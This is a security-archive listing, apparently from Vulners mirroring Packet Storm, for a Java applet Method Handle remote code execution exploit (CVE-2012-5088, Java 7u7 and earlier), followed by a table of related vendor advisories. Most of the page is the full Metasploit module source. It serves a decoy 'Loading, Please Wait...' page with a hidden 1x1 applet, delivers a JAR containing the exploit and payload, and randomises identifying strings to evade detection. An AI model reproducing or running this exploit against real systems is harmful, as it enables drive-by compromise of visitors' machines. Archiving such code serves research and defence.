Java Applet Method Handle Remote Code Execution

🗓️ 23 Jan 2013 00:00:00Reported by juan vazquezType

packetstorm🔗 packetstormsecurity.com👁 40 Views

Java Applet Method Handle Remote Code Execution module exploits the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier. It supports Java, Windows, OSX, and Linux platforms.

Reporter	Title	Published	Views	Family All 76
0day.today	Java Applet Method Handle Remote Code Execution Vulnerability	23 Jan 201300:00	–	zdt
IBM Security Bulletins	Security Bulletin: IBM Rational Build Forge Java (CVE-2012-3216, CVE-2012-5077, CVE-2012-5073, CVE-2012-5074, CVE-2012-5083, CVE-2012-5072, CVE-2012-1531, CVE-2012-5081, CVE-2012-5069, CVE-2012-5079, CVE-2012-5088)	17 Jun 201804:45	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Rational Functional Tester versions 8.x due to security vulnerabilities in IBM JRE 7.0 Service Release 2 or earlier, and non-IBM Java 7.0	7 May 201913:40	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Operational Decision Manager and WebSphere ILOG JRules: Multiple security vulnerabilities in IBM JRE 6.0	25 Sep 202223:13	–	ibm
Tenable Nessus	CentOS 6 : java-1.7.0-openjdk (CESA-2012:1386) (ROBOT)	18 Oct 201200:00	–	nessus
Tenable Nessus	GLSA-201401-30 : Oracle JRE/JDK: Multiple vulnerabilities (ROBOT)	27 Jan 201400:00	–	nessus
Tenable Nessus	MiracleLinux 4 : java-1.7.0-openjdk-1.7.0.9-2.3.3.AXS4.1 (AXSA:2012-967:03)	14 Jan 202600:00	–	nessus
Tenable Nessus	openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2012:1419-1) (ROBOT)	13 Jun 201400:00	–	nessus
Tenable Nessus	Oracle Linux 6 : java-1.7.0-openjdk (ELSA-2012-1386)	12 Jul 201300:00	–	nessus
Tenable Nessus	Oracle Java SE Multiple Vulnerabilities (October 2012 CPU)	17 Oct 201200:00	–	nessus

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'rex'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::EXE  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({ :javascript => false })  
  
def initialize( info = {} )  
  
super( update_info( info,  
'Name' => 'Java Applet Method Handle Remote Code Execution',  
'Description' => %q{  
This module abuses the Method Handle class from a Java Applet to run arbitrary  
Java code outside of the sandbox. The vulnerability affects Java version 7u7 and  
earlier.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Unknown', # Vulnerability discovery at security-explorations.com  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2012-5088' ],  
[ 'URL', '86352' ],  
[ 'BID', '56057' ],  
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],  
[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]  
],  
'Platform' => [ 'java', 'win', 'osx', 'linux' ],  
'Payload' => { 'Space' => 20480, 'DisableNops' => true },  
'Targets' =>  
[  
[ 'Generic (Java Payload)',  
{  
'Platform' => ['java'],  
'Arch' => ARCH_JAVA,  
}  
],  
[ 'Windows x86 (Native Payload)',  
{  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
}  
],  
[ 'Mac OS X x86 (Native Payload)',  
{  
'Platform' => 'osx',  
'Arch' => ARCH_X86,  
}  
],  
[ 'Linux x86 (Native Payload)',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86,  
}  
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Oct 16 2012'  
))  
end  
  
  
def setup  
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class")  
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }  
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class")  
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }  
  
@exploit_class_name = rand_text_alpha("Exploit".length)  
@exploit_class.gsub!("Exploit", @exploit_class_name)  
super  
end  
  
def on_request_uri(cli, request)  
print_status("handling request for #{request.uri}")  
  
case request.uri  
when /\.jar$/i  
jar = payload.encoded_jar  
jar.add_file("#{@exploit_class_name}.class", @exploit_class)  
jar.add_file("B.class", @loader_class)  
metasploit_str = rand_text_alpha("metasploit".length)  
payload_str = rand_text_alpha("payload".length)  
jar.entries.each { |entry|  
entry.name.gsub!("metasploit", metasploit_str)  
entry.name.gsub!("Payload", payload_str)  
entry.data = entry.data.gsub("metasploit", metasploit_str)  
entry.data = entry.data.gsub("Payload", payload_str)  
}  
jar.build_manifest  
  
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })  
when /\/$/  
payload = regenerate_payload(cli)  
if not payload  
print_error("Failed to generate the payload.")  
send_not_found(cli)  
return  
end  
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })  
else  
send_redirect(cli, get_resource() + '/', '')  
end  
  
end  
  
def generate_html  
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|  
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|  
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|  
html += %Q|</applet></body></html>|  
return html  
end  
  
end  
`

23 Jan 2013 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.81791